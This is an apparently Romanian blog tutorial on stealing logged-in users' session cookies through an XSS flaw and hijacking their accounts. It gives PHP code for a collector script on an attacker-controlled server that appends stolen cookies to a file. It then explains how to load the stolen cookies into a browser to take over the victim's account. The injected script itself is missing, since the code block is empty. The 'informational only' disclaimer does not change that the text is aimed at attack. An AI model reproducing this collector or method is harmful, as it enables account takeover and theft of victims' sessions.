XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele.
Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php:
Code:
$cookie = $HTTP_GET_VARS["cgrab"];
$fh = fopen('cookies.txt', 'a');
fwrite($fh, $cookie . "\n\n");
?>
Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma . Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta:
Code:
trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.
IMPORTANT: acest tutorial are caracter informativ, orice actiune pe care o faceti este ilegala iar eu nu sunt respunzator de faptele voastre.
tutorial by crs12decoder
Niciun comentariu:
Trimiteți un comentariu